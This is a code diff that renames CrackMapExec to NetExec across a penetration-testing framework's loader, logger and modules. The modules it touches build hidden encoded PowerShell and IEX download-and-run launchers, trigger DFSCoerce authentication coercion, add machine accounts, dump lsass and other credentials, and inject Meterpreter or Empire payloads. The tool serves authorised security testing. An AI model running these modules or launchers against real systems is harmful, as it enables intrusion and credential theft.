cme_logger.error(f"Command exceeds maximum length of 8191 chars (was {len(command)}). exiting.") nxc_logger.error(f"Command exceeds maximum length of 8191 chars (was {len(command)}). exiting.")
exit(1) exit(1)
obfs_attempts += 1 obfs_attempts += 1
else: else:
command = f"powershell.exe -noni -nop -w 1 -enc {encode_ps_command(command)}" command = f"powershell.exe -noni -nop -w 1 -enc {encode_ps_command(command)}"
if len(command) > 8191: if len(command) > 8191:
cme_logger.error(f"Command exceeds maximum length of 8191 chars (was {len(command)}). exiting.") nxc_logger.error(f"Command exceeds maximum length of 8191 chars (was {len(command)}). exiting.")
exit(1) exit(1)
return command return command
@ -253,7 +253,7 @@ $request.GetResponse()""".format(
command=command, command=command,
) )
cme_logger.debug(f"Generated PS IEX Launcher:\n {launcher}\n") nxc_logger.debug(f"Generated PS IEX Launcher:\n {launcher}\n")
return launcher.strip() return launcher.strip()

View File

@ -1,7 +1,7 @@
#!/usr/bin/env python3 #!/usr/bin/env python3
# -*- coding: utf-8 -*- # -*- coding: utf-8 -*-
import cme import nxc
import importlib import importlib
import traceback import traceback
import sys import sys
@ -10,9 +10,9 @@ from os import listdir
from os.path import dirname from os.path import dirname
from os.path import join as path_join from os.path import join as path_join
from cme.context import Context from nxc.context import Context
from cme.logger import CMEAdapter from nxc.logger import NXCAdapter
from cme.paths import CME_PATH from nxc.paths import nxc_PATH
class ModuleLoader: class ModuleLoader:
@ -60,8 +60,8 @@ class ModuleLoader:
Load a module, initializing it and checking that it has the proper attributes Load a module, initializing it and checking that it has the proper attributes
""" """
try: try:
spec = importlib.util.spec_from_file_location("CMEModule", module_path) spec = importlib.util.spec_from_file_location("nxcModule", module_path)
module = spec.loader.load_module().CMEModule() module = spec.loader.load_module().nxcModule()
if self.module_is_sane(module, module_path): if self.module_is_sane(module, module_path):
return module return module
@ -82,9 +82,9 @@ class ModuleLoader:
self.logger.debug(f"Protocol: {self.args.protocol}") self.logger.debug(f"Protocol: {self.args.protocol}")
if self.args.protocol in module.supported_protocols: if self.args.protocol in module.supported_protocols:
try: try:
module_logger = CMEAdapter(extra={"module_name": module.name.upper()}) module_logger = NXCAdapter(extra={"module_name": module.name.upper()})
except Exception as e: except Exception as e:
self.logger.fail(f"Error loading CMEAdaptor for module {module.name.upper()}: {e}") self.logger.fail(f"Error loading nxcAdaptor for module {module.name.upper()}: {e}")
context = Context(self.db, module_logger, self.args) context = Context(self.db, module_logger, self.args)
module_options = {} module_options = {}
@ -103,8 +103,8 @@ class ModuleLoader:
Get the path, description, and options from a module Get the path, description, and options from a module
""" """
try: try:
spec = importlib.util.spec_from_file_location("CMEModule", module_path) spec = importlib.util.spec_from_file_location("nxcModule", module_path)
module_spec = spec.loader.load_module().CMEModule module_spec = spec.loader.load_module().nxcModule
module = { module = {
f"{module_spec.name.lower()}": { f"{module_spec.name.lower()}": {
@ -129,8 +129,8 @@ class ModuleLoader:
""" """
modules = {} modules = {}
modules_paths = [ modules_paths = [
path_join(dirname(cme.__file__), "modules"), path_join(dirname(nxc.__file__), "modules"),
path_join(CME_PATH, "modules"), path_join(nxc_PATH, "modules"),
] ]
for path in modules_paths: for path in modules_paths:

View File

@ -5,12 +5,12 @@ from importlib.machinery import SourceFileLoader
from os import listdir from os import listdir
from os.path import join as path_join from os.path import join as path_join
from os.path import dirname, exists, expanduser from os.path import dirname, exists, expanduser
import cme import nxc
class ProtocolLoader: class ProtocolLoader:
def __init__(self): def __init__(self):
self.cme_path = expanduser("~/.cme") self.nxc_path = expanduser("~/.nxc")
def load_protocol(self, protocol_path): def load_protocol(self, protocol_path):
loader = SourceFileLoader("protocol", protocol_path) loader = SourceFileLoader("protocol", protocol_path)
@ -21,8 +21,8 @@ class ProtocolLoader:
def get_protocols(self): def get_protocols(self):
protocols = {} protocols = {}
protocol_paths = [ protocol_paths = [
path_join(dirname(cme.__file__), "protocols"), path_join(dirname(nxc.__file__), "protocols"),
path_join(self.cme_path, "protocols"), path_join(self.nxc_path, "protocols"),
] ]
for path in protocol_paths: for path in protocol_paths:

View File

@ -6,28 +6,28 @@ from logging.handlers import RotatingFileHandler
import os.path import os.path
import sys import sys
import re import re
from cme.helpers.misc import called_from_cmd_args from nxc.helpers.misc import called_from_cmd_args
from cme.console import cme_console from nxc.console import nxc_console
from termcolor import colored from termcolor import colored
from datetime import datetime from datetime import datetime
from rich.text import Text from rich.text import Text
from rich.logging import RichHandler from rich.logging import RichHandler
class CMEAdapter(logging.LoggerAdapter): class NXCAdapter(logging.LoggerAdapter):
def __init__(self, extra=None): def __init__(self, extra=None):
logging.basicConfig( logging.basicConfig(
format="%(message)s", format="%(message)s",
datefmt="[%X]", datefmt="[%X]",
handlers=[ handlers=[
RichHandler( RichHandler(
console=cme_console, console=nxc_console,
rich_tracebacks=True, rich_tracebacks=True,
tracebacks_show_locals=False, tracebacks_show_locals=False,
) )
], ],
) )
self.logger = logging.getLogger("cme") self.logger = logging.getLogger("nxc")
self.extra = extra self.extra = extra
self.output_file = None self.output_file = None
@ -55,7 +55,7 @@ class CMEAdapter(logging.LoggerAdapter):
kwargs, kwargs,
) )
# If the logger is being called from CMEServer # If the logger is being called from nxcServer
if len(self.extra) == 2 and ("module_name" in self.extra.keys()) and ("host" in self.extra.keys()): if len(self.extra) == 2 and ("module_name" in self.extra.keys()) and ("host" in self.extra.keys()):
return ( return (
f"{colored(self.extra['module_name'], 'cyan', attrs=['bold']):<24} {self.extra['host']:<39} {msg}", f"{colored(self.extra['module_name'], 'cyan', attrs=['bold']):<24} {self.extra['host']:<39} {msg}",
@ -75,7 +75,7 @@ class CMEAdapter(logging.LoggerAdapter):
def display(self, msg, *args, **kwargs): def display(self, msg, *args, **kwargs):
""" """
Display text to console, formatted for CME Display text to console, formatted for nxc
""" """
try: try:
if "protocol" in self.extra.keys() and not called_from_cmd_args(): if "protocol" in self.extra.keys() and not called_from_cmd_args():
@ -85,7 +85,7 @@ class CMEAdapter(logging.LoggerAdapter):
msg, kwargs = self.format(f"{colored('[*]', 'blue', attrs=['bold'])} {msg}", kwargs) msg, kwargs = self.format(f"{colored('[*]', 'blue', attrs=['bold'])} {msg}", kwargs)
text = Text.from_ansi(msg) text = Text.from_ansi(msg)
cme_console.print(text, *args, **kwargs) nxc_console.print(text, *args, **kwargs)
self.log_console_to_file(text, *args, **kwargs) self.log_console_to_file(text, *args, **kwargs)
def success(self, msg, color='green', *args, **kwargs): def success(self, msg, color='green', *args, **kwargs):
@ -100,7 +100,7 @@ class CMEAdapter(logging.LoggerAdapter):
msg, kwargs = self.format(f"{colored('[+]', color, attrs=['bold'])} {msg}", kwargs) msg, kwargs = self.format(f"{colored('[+]', color, attrs=['bold'])} {msg}", kwargs)
text = Text.from_ansi(msg) text = Text.from_ansi(msg)
cme_console.print(text, *args, **kwargs) nxc_console.print(text, *args, **kwargs)
self.log_console_to_file(text, *args, **kwargs) self.log_console_to_file(text, *args, **kwargs)
def highlight(self, msg, *args, **kwargs): def highlight(self, msg, *args, **kwargs):
@ -115,7 +115,7 @@ class CMEAdapter(logging.LoggerAdapter):
msg, kwargs = self.format(f"{colored(msg, 'yellow', attrs=['bold'])}", kwargs) msg, kwargs = self.format(f"{colored(msg, 'yellow', attrs=['bold'])}", kwargs)
text = Text.from_ansi(msg) text = Text.from_ansi(msg)
cme_console.print(text, *args, **kwargs) nxc_console.print(text, *args, **kwargs)
self.log_console_to_file(text, *args, **kwargs) self.log_console_to_file(text, *args, **kwargs)
def fail(self, msg, color='red', *args, **kwargs): def fail(self, msg, color='red', *args, **kwargs):
@ -129,7 +129,7 @@ class CMEAdapter(logging.LoggerAdapter):
pass pass
msg, kwargs = self.format(f"{colored('[-]', color, attrs=['bold'])} {msg}", kwargs) msg, kwargs = self.format(f"{colored('[-]', color, attrs=['bold'])} {msg}", kwargs)
text = Text.from_ansi(msg) text = Text.from_ansi(msg)
cme_console.print(text, *args, **kwargs) nxc_console.print(text, *args, **kwargs)
self.log_console_to_file(text, *args, **kwargs) self.log_console_to_file(text, *args, **kwargs)
def log_console_to_file(self, text, *args, **kwargs): def log_console_to_file(self, text, *args, **kwargs):
@ -144,7 +144,7 @@ class CMEAdapter(logging.LoggerAdapter):
for handler in self.logger.handlers: for handler in self.logger.handlers:
handler.handle( handler.handle(
LogRecord( LogRecord(
"cme", "nxc",
20, 20,
"", "",
kwargs, kwargs,
@ -181,11 +181,11 @@ class CMEAdapter(logging.LoggerAdapter):
@staticmethod @staticmethod
def init_log_file(): def init_log_file():
newpath = os.path.expanduser("~/.cme") + "/logs/" + datetime.now().strftime('%Y-%m-%d') newpath = os.path.expanduser("~/.nxc") + "/logs/" + datetime.now().strftime('%Y-%m-%d')
if not os.path.exists(newpath): if not os.path.exists(newpath):
os.makedirs(newpath) os.makedirs(newpath)
log_filename = os.path.join( log_filename = os.path.join(
os.path.expanduser("~/.cme"), os.path.expanduser("~/.nxc"),
"logs", "logs",
datetime.now().strftime('%Y-%m-%d'), datetime.now().strftime('%Y-%m-%d'),
f"log_{datetime.now().strftime('%Y-%m-%d-%H-%M-%S')}.log", f"log_{datetime.now().strftime('%Y-%m-%d-%H-%M-%S')}.log",
@ -205,5 +205,5 @@ class TermEscapeCodeFormatter(logging.Formatter):
return super().format(record) return super().format(record)
# initialize the logger for all of CME - this is imported everywhere # initialize the logger for all of nxc - this is imported everywhere
cme_logger = CMEAdapter() nxc_logger = NXCAdapter()

View File

@ -11,7 +11,7 @@ from impacket.dcerpc.v5.rpcrt import RPC_C_AUTHN_LEVEL_NONE
from impacket.dcerpc.v5.dcomrt import IObjectExporter from impacket.dcerpc.v5.dcomrt import IObjectExporter
class CMEModule: class nxcModule:
name = "ioxidresolver" name = "ioxidresolver"
description = "This module helps you to identify hosts that have additional active interfaces" description = "This module helps you to identify hosts that have additional active interfaces"
supported_protocols = ["smb", "wmi"] supported_protocols = ["smb", "wmi"]

View File

@ -2,12 +2,12 @@
# -*- coding: utf-8 -*- # -*- coding: utf-8 -*-
class CMEModule: class nxcModule:
""" """
Module by Shutdown and Podalirius Module by Shutdown and Podalirius
Initial module: Initial module:
https://github.com/ShutdownRepo/CrackMapExec-MachineAccountQuota https://github.com/ShutdownRepo/NetExec-MachineAccountQuota
Authors: Authors:
Shutdown: @_nwodtuhs Shutdown: @_nwodtuhs

View File

@ -5,7 +5,7 @@ from impacket.ldap import ldap, ldapasn1
from impacket.ldap.ldap import LDAPSearchError from impacket.ldap.ldap import LDAPSearchError
class CMEModule: class nxcModule:
""" """
Find PKI Enrollment Services in Active Directory and Certificate Templates Names. Find PKI Enrollment Services in Active Directory and Certificate Templates Names.

View File

@ -5,11 +5,11 @@
import ldap3 import ldap3
from impacket.dcerpc.v5 import samr, epm, transport from impacket.dcerpc.v5 import samr, epm, transport
class CMEModule: class nxcModule:
''' '''
Module by CyberCelt: @Cyb3rC3lt Module by CyberCelt: @Cyb3rC3lt
Initial module: Initial module:
https://github.com/Cyb3rC3lt/CrackMapExec-Modules https://github.com/Cyb3rC3lt/NetExec-Modules
Thanks to the guys at impacket for the original code Thanks to the guys at impacket for the original code
''' '''
@ -26,9 +26,9 @@ class CMEModule:
PASSWORD: Specify the PASSWORD option to supply a password for the Computer to be added PASSWORD: Specify the PASSWORD option to supply a password for the Computer to be added
DELETE: Specify DELETE to remove a Computer DELETE: Specify DELETE to remove a Computer
CHANGEPW: Specify CHANGEPW to modify a Computer password CHANGEPW: Specify CHANGEPW to modify a Computer password
Usage: cme smb $DC-IP -u Username -p Password -M add-computer -o NAME="BADPC" PASSWORD="Password1" Usage: nxc smb $DC-IP -u Username -p Password -M add-computer -o NAME="BADPC" PASSWORD="Password1"
cme smb $DC-IP -u Username -p Password -M add-computer -o NAME="BADPC" DELETE=True nxc smb $DC-IP -u Username -p Password -M add-computer -o NAME="BADPC" DELETE=True
cme smb $DC-IP -u Username -p Password -M add-computer -o NAME="BADPC" PASSWORD="Password2" CHANGEPW=True nxc smb $DC-IP -u Username -p Password -M add-computer -o NAME="BADPC" PASSWORD="Password2" CHANGEPW=True
''' '''
self.__baseDN = None self.__baseDN = None
@ -296,9 +296,9 @@ class CMEModule:
['top', 'person', 'organizationalPerson', 'user', 'computer'], ucd) ['top', 'person', 'organizationalPerson', 'user', 'computer'], ucd)
if result: if result:
context.log.highlight('Successfully added the machine account: "' + self.__computerName + '" with Password: "' + self.__computerPassword + '"') context.log.highlight('Successfully added the machine account: "' + self.__computerName + '" with Password: "' + self.__computerPassword + '"')
context.log.highlight(u'{}'.format('You can try to verify this with the CME command:')) context.log.highlight(u'{}'.format('You can try to verify this with the nxc command:'))
context.log.highlight(u'{}'.format( context.log.highlight(u'{}'.format(
'cme ldap ' + connection.host + ' -u ' + connection.username + ' -p ' + connection.password + ' -M group-mem -o GROUP="Domain Computers"')) 'nxc ldap ' + connection.host + ' -u ' + connection.username + ' -p ' + connection.password + ' -M group-mem -o GROUP="Domain Computers"'))
elif result == False and c.last_error == "entryAlreadyExists": elif result == False and c.last_error == "entryAlreadyExists":
context.log.highlight(u'{}'.format('The Computer account "' + self.__computerName + '" already exists')) context.log.highlight(u'{}'.format('The Computer account "' + self.__computerName + '" already exists'))
elif not result: elif not result:

View File

@ -1,6 +1,6 @@
#!/usr/bin/env python3 #!/usr/bin/env python3
# -*- coding: utf-8 -*- # -*- coding: utf-8 -*-
class CMEModule: class nxcModule:
""" """
Checks for credentials in IIS Application Pool configuration files using appcmd.exe. Checks for credentials in IIS Application Pool configuration files using appcmd.exe.

View File

@ -11,7 +11,7 @@ from neo4j import GraphDatabase
from neo4j.exceptions import AuthError, ServiceUnavailable from neo4j.exceptions import AuthError, ServiceUnavailable
class CMEModule: class nxcModule:
name = "bh_owned" name = "bh_owned"
description = "Set pwned computer as owned in Bloodhound" description = "Set pwned computer as owned in Bloodhound"
supported_protocols = ["smb"] supported_protocols = ["smb"]

View File

@ -6,7 +6,7 @@ import datetime
from enum import Enum from enum import Enum
from impacket.ldap import ldaptypes from impacket.ldap import ldaptypes
from impacket.uuid import bin_to_string from impacket.uuid import bin_to_string
from cme.helpers.msada_guids import SCHEMA_OBJECTS, EXTENDED_RIGHTS from nxc.helpers.msada_guids import SCHEMA_OBJECTS, EXTENDED_RIGHTS
from ldap3.protocol.formatters.formatters import format_sid from ldap3.protocol.formatters.formatters import format_sid
from ldap3.utils.conv import escape_filter_chars from ldap3.utils.conv import escape_filter_chars
from ldap3.protocol.microsoft import security_descriptor_control from ldap3.protocol.microsoft import security_descriptor_control
@ -187,7 +187,7 @@ class ALLOWED_OBJECT_ACE_MASK_FLAGS(Enum):
Self = ldaptypes.ACCESS_ALLOWED_OBJECT_ACE.ADS_RIGHT_DS_SELF Self = ldaptypes.ACCESS_ALLOWED_OBJECT_ACE.ADS_RIGHT_DS_SELF
class CMEModule: class nxcModule:
""" """
Module to read and backup the Discretionary Access Control List of one or multiple objects. Module to read and backup the Discretionary Access Control List of one or multiple objects.
This module is essentially inspired from the dacledit.py script of Impacket that we have coauthored, @_nwodtuhs and me. This module is essentially inspired from the dacledit.py script of Impacket that we have coauthored, @_nwodtuhs and me.

View File

@ -7,10 +7,10 @@ from impacket.dcerpc.v5.ndr import NDRCALL
from impacket.dcerpc.v5.dtypes import ULONG, WSTR, DWORD from impacket.dcerpc.v5.dtypes import ULONG, WSTR, DWORD
from impacket.dcerpc.v5.rpcrt import DCERPCException from impacket.dcerpc.v5.rpcrt import DCERPCException
from impacket.uuid import uuidtup_to_bin from impacket.uuid import uuidtup_to_bin
from cme.logger import cme_logger from nxc.logger import nxc_logger
class CMEModule: class nxcModule:
name = "dfscoerce" name = "dfscoerce"
description = "Module to check if the DC is vulnerable to DFSCocerc, credit to @filip_dragovic/@Wh04m1001 and @topotam" description = "Module to check if the DC is vulnerable to DFSCocerc, credit to @filip_dragovic/@Wh04m1001 and @topotam"
supported_protocols = ["smb"] supported_protocols = ["smb"]
@ -123,31 +123,31 @@ class TriggerAuth:
rpctransport.setRemoteHost(target) rpctransport.setRemoteHost(target)
dce = rpctransport.get_dce_rpc() dce = rpctransport.get_dce_rpc()
cme_logger.debug("[-] Connecting to %s" % r"ncacn_np:%s[\PIPE\netdfs]" % target) nxc_logger.debug("[-] Connecting to %s" % r"ncacn_np:%s[\PIPE\netdfs]" % target)
try: try:
dce.connect() dce.connect()
except Exception as e: except Exception as e:
cme_logger.debug("Something went wrong, check error status => %s" % str(e)) nxc_logger.debug("Something went wrong, check error status => %s" % str(e))
return return
try: try:
dce.bind(uuidtup_to_bin(("4FC742E0-4A10-11CF-8273-00AA004AE673", "3.0"))) dce.bind(uuidtup_to_bin(("4FC742E0-4A10-11CF-8273-00AA004AE673", "3.0")))
except Exception as e: except Exception as e:
cme_logger.debug("Something went wrong, check error status => %s" % str(e)) nxc_logger.debug("Something went wrong, check error status => %s" % str(e))
return return
cme_logger.debug("[+] Successfully bound!") nxc_logger.debug("[+] Successfully bound!")
return dce return dce
def NetrDfsRemoveStdRoot(self, dce, listener): def NetrDfsRemoveStdRoot(self, dce, listener):
cme_logger.debug("[-] Sending NetrDfsRemoveStdRoot!") nxc_logger.debug("[-] Sending NetrDfsRemoveStdRoot!")
try: try:
request = NetrDfsRemoveStdRoot() request = NetrDfsRemoveStdRoot()
request["ServerName"] = "%s\x00" % listener request["ServerName"] = "%s\x00" % listener
request["RootShare"] = "test\x00" request["RootShare"] = "test\x00"
request["ApiFlags"] = 1 request["ApiFlags"] = 1
if self.args.verbose: if self.args.verbose:
cme_logger.debug(request.dump()) nxc_logger.debug(request.dump())
# logger.debug(request.dump()) # logger.debug(request.dump())
resp = dce.request(request) resp = dce.request(request)
except Exception as e: except Exception as e:
cme_logger.debug(e) nxc_logger.debug(e)

View File

@ -4,7 +4,7 @@
import ntpath import ntpath
class CMEModule: class nxcModule:
""" """
Technique discovered by @DTMSecurity and @domchell to remotely coerce an host to start WebClient service. Technique discovered by @DTMSecurity and @domchell to remotely coerce an host to start WebClient service.
https://dtm.uk/exploring-search-connectors-and-library-files-on-windows/ https://dtm.uk/exploring-search-connectors-and-library-files-on-windows/

View File

@ -11,7 +11,7 @@ from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning) requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
class CMEModule: class nxcModule:
""" """
Uses Empire's RESTful API to generate a launcher for the specified listener and executes it Uses Empire's RESTful API to generate a launcher for the specified listener and executes it
Module by @byt3bl33d3r Module by @byt3bl33d3r
@ -75,7 +75,7 @@ class CMEModule:
sys.exit(1) sys.exit(1)
data = { data = {
"name": "cme_ephemeral", "name": "nxc_ephemeral",
"template": "multi_launcher", "template": "multi_launcher",
"options": { "options": {
"Listener": module_options["LISTENER"], "Listener": module_options["LISTENER"],

View File

@ -10,7 +10,7 @@ from impacket.dcerpc.v5 import transport
import pathlib import pathlib
class CMEModule: class nxcModule:
""" """
Uses LsarLookupNames and NamedPipes to gather information on all endpoint protection solutions installed on the the remote host(s) Uses LsarLookupNames and NamedPipes to gather information on all endpoint protection solutions installed on the the remote host(s)
Module by @mpgn_x64 Module by @mpgn_x64

View File

@ -2,10 +2,10 @@
# -*- coding: utf-8 -*- # -*- coding: utf-8 -*-
from datetime import datetime from datetime import datetime
from cme.helpers.logger import write_log from nxc.helpers.logger import write_log
class CMEModule: class nxcModule:
""" """
Uses WMI to dump DNS from an AD DNS Server. Uses WMI to dump DNS from an AD DNS Server.
Module by @fang0654 Module by @fang0654
@ -72,4 +72,4 @@ class CMEModule:
log_name = "DNS-Enum-{}-{}.log".format(connection.host, datetime.now().strftime("%Y-%m-%d_%H%M%S")) log_name = "DNS-Enum-{}-{}.log".format(connection.host, datetime.now().strftime("%Y-%m-%d_%H%M%S"))
write_log(data, log_name) write_log(data, log_name)
context.log.display(f"Saved raw output to ~/.cme/logs/{log_name}") context.log.display(f"Saved raw output to ~/.nxc/logs/{log_name}")

View File

@ -2,7 +2,7 @@
# -*- coding: utf-8 -*- # -*- coding: utf-8 -*-
class CMEModule: class nxcModule:
""" """
Example Example
Module by @yomama Module by @yomama

View File

@ -3,12 +3,12 @@
import socket import socket
import sys import sys
class CMEModule: class nxcModule:
''' '''
Module by CyberCelt: @Cyb3rC3lt Module by CyberCelt: @Cyb3rC3lt
Initial module: Initial module:
https://github.com/Cyb3rC3lt/CrackMapExec-Modules https://github.com/Cyb3rC3lt/NetExec-Modules
''' '''
name = 'find-computer' name = 'find-computer'
@ -21,8 +21,8 @@ class CMEModule:
''' '''
find-computer: Specify find-computer to call the module find-computer: Specify find-computer to call the module
TEXT: Specify the TEXT option to enter your text to search for TEXT: Specify the TEXT option to enter your text to search for
Usage: cme ldap $DC-IP -u Username -p Password -M find-computer -o TEXT="server" Usage: nxc ldap $DC-IP -u Username -p Password -M find-computer -o TEXT="server"
cme ldap $DC-IP -u Username -p Password -M find-computer -o TEXT="SQL" nxc ldap $DC-IP -u Username -p Password -M find-computer -o TEXT="SQL"
''' '''
self.TEXT = '' self.TEXT = ''

View File

@ -1,9 +1,9 @@
#!/usr/bin/env python3 #!/usr/bin/env python3
from dploot.lib.target import Target from dploot.lib.target import Target
from cme.protocols.smb.firefox import FirefoxTriage from nxc.protocols.smb.firefox import FirefoxTriage
class CMEModule: class nxcModule:
""" """
Firefox by @zblurx Firefox by @zblurx
Inspired by firefox looting from DonPAPI Inspired by firefox looting from DonPAPI

View File

@ -4,10 +4,10 @@
from impacket.ldap import ldapasn1 as ldapasn1_impacket from impacket.ldap import ldapasn1 as ldapasn1_impacket
from impacket.ldap import ldap as ldap_impacket from impacket.ldap import ldap as ldap_impacket
import re import re
from cme.logger import cme_logger from nxc.logger import nxc_logger
class CMEModule: class nxcModule:
""" """
Get description of users Get description of users
Module by @nodauf Module by @nodauf
@ -56,7 +56,7 @@ class CMEModule:
resp = e.getAnswers() resp = e.getAnswers()
pass pass
else: else:
cme_logger.debug(e) nxc_logger.debug(e)
return False return False
answers = [] answers = []

View File

@ -2,11 +2,11 @@
# -*- coding: utf-8 -*- # -*- coding: utf-8 -*-
from datetime import datetime from datetime import datetime
from cme.helpers.logger import write_log from nxc.helpers.logger import write_log
import json import json
class CMEModule: class nxcModule:
""" """
Uses WMI to extract network connections, used to find multi-homed hosts. Uses WMI to extract network connections, used to find multi-homed hosts.
Module by @fang0654 Module by @fang0654
@ -37,4 +37,4 @@ class CMEModule:
log_name = "network-connections-{}-{}.log".format(connection.host, datetime.now().strftime("%Y-%m-%d_%H%M%S")) log_name = "network-connections-{}-{}.log".format(connection.host, datetime.now().strftime("%Y-%m-%d_%H%M%S"))
write_log(json.dumps(data), log_name) write_log(json.dumps(data), log_name)
context.log.display(f"Saved raw output to ~/.cme/logs/{log_name}") context.log.display(f"Saved raw output to ~/.nxc/logs/{log_name}")

View File

@ -5,7 +5,7 @@ import xml.etree.ElementTree as ET
from io import BytesIO from io import BytesIO
class CMEModule: class nxcModule:
""" """
Reference: https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Get-GPPAutologon.ps1 Reference: https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Get-GPPAutologon.ps1
Module by @byt3bl33d3r Module by @byt3bl33d3r

View File

@ -8,7 +8,7 @@ from binascii import unhexlify
from io import BytesIO from io import BytesIO
class CMEModule: class nxcModule:
""" """
Reference: https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Get-GPPPassword.ps1 Reference: https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Get-GPPPassword.ps1
Module by @byt3bl33d3r Module by @byt3bl33d3r

View File

@ -3,12 +3,12 @@
from impacket.ldap import ldapasn1 as ldapasn1_impacket from impacket.ldap import ldapasn1 as ldapasn1_impacket
class CMEModule: class nxcModule:
''' '''
Module by CyberCelt: @Cyb3rC3lt Module by CyberCelt: @Cyb3rC3lt
Initial module: Initial module:
https://github.com/Cyb3rC3lt/CrackMapExec-Modules https://github.com/Cyb3rC3lt/NetExec-Modules
''' '''
name = 'group-mem' name = 'group-mem'
@ -23,8 +23,8 @@ class CMEModule:
''' '''
group-mem: Specify group-mem to call the module group-mem: Specify group-mem to call the module
GROUP: Specify the GROUP option to query for that group's members GROUP: Specify the GROUP option to query for that group's members
Usage: cme ldap $DC-IP -u Username -p Password -M group-mem -o GROUP="domain admins" Usage: nxc ldap $DC-IP -u Username -p Password -M group-mem -o GROUP="domain admins"
cme ldap $DC-IP -u Username -p Password -M group-mem -o GROUP="domain controllers" nxc ldap $DC-IP -u Username -p Password -M group-mem -o GROUP="domain controllers"
''' '''
self.GROUP = '' self.GROUP = ''

View File

@ -5,13 +5,13 @@ from impacket.ldap import ldapasn1 as ldapasn1_impacket
from impacket.ldap import ldap as ldap_impacket from impacket.ldap import ldap as ldap_impacket
class CMEModule: class nxcModule:
""" """
Created as a contributtion from HackTheBox Academy team for CrackMapExec Created as a contributtion from HackTheBox Academy team for NetExec
Reference: https://academy.hackthebox.com/module/details/84 Reference: https://academy.hackthebox.com/module/details/84
Module by @juliourena Module by @juliourena
Based on: https://github.com/juliourena/CrackMapExec/blob/master/cme/modules/get_description.py Based on: https://github.com/juliourena/NetExec/blob/master/nxc/modules/get_description.py
""" """
name = "groupmembership" name = "groupmembership"

File diff suppressed because one or more lines are too long

View File

@ -32,7 +32,7 @@ def neo4j_conn(context, connection, driver):
context.log.fail("Error querying domain admins") context.log.fail("Error querying domain admins")
context.log.debug(e) context.log.debug(e)
else: else:
context.log.fail("BloodHound not marked enabled. Check cme.conf") context.log.fail("BloodHound not marked enabled. Check nxc.conf")
exit(1) exit(1)
@ -134,7 +134,7 @@ def initial_run(connection, cursor):
) )
class CMEModule: class nxcModule:
name = "hash_spider" name = "hash_spider"
description = "Dump lsass recursively from a given hash using BH to find local admins" description = "Dump lsass recursively from a given hash using BH to find local admins"
supported_protocols = ["smb"] supported_protocols = ["smb"]
@ -271,8 +271,8 @@ class CMEModule:
exit() exit()
def on_admin_login(self, context, connection): def on_admin_login(self, context, connection):
db_path = connection.config.get("CME", "workspace") db_path = connection.config.get("nxc", "workspace")
# DB will be saved at ./CrackMapExec/hash_spider_default.sqlite3 if workspace in cme.conf is "default" # DB will be saved at ./NetExec/hash_spider_default.sqlite3 if workspace in nxc.conf is "default"
db_name = f"hash_spider_{db_path}.sqlite3" db_name = f"hash_spider_{db_path}.sqlite3"
dbconnection = connect(db_name, check_same_thread=False, isolation_level=None) dbconnection = connect(db_name, check_same_thread=False, isolation_level=None)

File diff suppressed because one or more lines are too long

View File

@ -6,7 +6,7 @@ from impacket.dcerpc.v5 import scmr
from impacket.examples.secretsdump import RemoteOperations from impacket.examples.secretsdump import RemoteOperations
class CMEModule: class nxcModule:
name = "install_elevated" name = "install_elevated"
description = "Checks for AlwaysInstallElevated" description = "Checks for AlwaysInstallElevated"
supported_protocols = ["smb"] supported_protocols = ["smb"]

View File

@ -1,7 +1,7 @@
from csv import reader from csv import reader
class CMEModule: class nxcModule:
""" """
Search for KeePass-related files and process Search for KeePass-related files and process

View File

@ -7,10 +7,10 @@ from csv import reader
from base64 import b64encode from base64 import b64encode
from io import BytesIO, StringIO from io import BytesIO, StringIO
from xml.etree import ElementTree from xml.etree import ElementTree
from cme.helpers.powershell import get_ps_script from nxc.helpers.powershell import get_ps_script
class CMEModule: class nxcModule:
""" """
Make use of KeePass' trigger system to export the database in cleartext Make use of KeePass' trigger system to export the database in cleartext
References: https://keepass.info/help/v2/triggers.html References: https://keepass.info/help/v2/triggers.html

View File

@ -3,9 +3,9 @@
import json import json
from impacket.ldap import ldapasn1 as ldapasn1_impacket from impacket.ldap import ldapasn1 as ldapasn1_impacket
from cme.protocols.ldap.laps import LDAPConnect, LAPSv2Extract from nxc.protocols.ldap.laps import LDAPConnect, LAPSv2Extract
class CMEModule: class nxcModule:
""" """
Module by technobro refactored by @mpgn (now compatible with LDAP protocol + filter by computer) Module by technobro refactored by @mpgn (now compatible with LDAP protocol + filter by computer)

View File

@ -13,7 +13,7 @@ from asyauth.common.credentials.kerberos import KerberosCredential
from asysocks.unicomm.common.target import UniTarget, UniProto from asysocks.unicomm.common.target import UniTarget, UniProto
class CMEModule: class nxcModule:
""" """
Checks whether LDAP signing and channelbinding are required. Checks whether LDAP signing and channelbinding are required.

View File

@ -11,10 +11,10 @@ from lsassy.impacketfile import ImpacketFile
from lsassy.parser import Parser from lsassy.parser import Parser
from lsassy.session import Session from lsassy.session import Session
from cme.helpers.bloodhound import add_user_bh from nxc.helpers.bloodhound import add_user_bh
class CMEModule: class nxcModule:
name = "lsassy" name = "lsassy"
description = "Dump lsass and parse the result remotely with lsassy" description = "Dump lsass and parse the result remotely with lsassy"
supported_protocols = ["smb"] supported_protocols = ["smb"]

View File

@ -2,10 +2,10 @@
# -*- coding: utf-8 -*- # -*- coding: utf-8 -*-
from masky import Masky from masky import Masky
from cme.helpers.bloodhound import add_user_bh from nxc.helpers.bloodhound import add_user_bh
class CMEModule: class nxcModule:
name = "masky" name = "masky"
description = "Remotely dump domain user credentials via an ADCS and a KDC" description = "Remotely dump domain user credentials via an ADCS and a KDC"
supported_protocols = ["smb"] supported_protocols = ["smb"]

View File

@ -4,7 +4,7 @@
from sys import exit from sys import exit
class CMEModule: class nxcModule:
""" """
Downloads the Meterpreter stager and injects it into memory using PowerSploit's Invoke-Shellcode.ps1 script Downloads the Meterpreter stager and injects it into memory using PowerSploit's Invoke-Shellcode.ps1 script
Module by @byt3bl33d3r Module by @byt3bl33d3r
@ -32,7 +32,7 @@ class CMEModule:
SSL Stager server use https or http (default: https) SSL Stager server use https or http (default: https)
multi/handler method that don't require RAND: multi/handler method that don't require RAND:
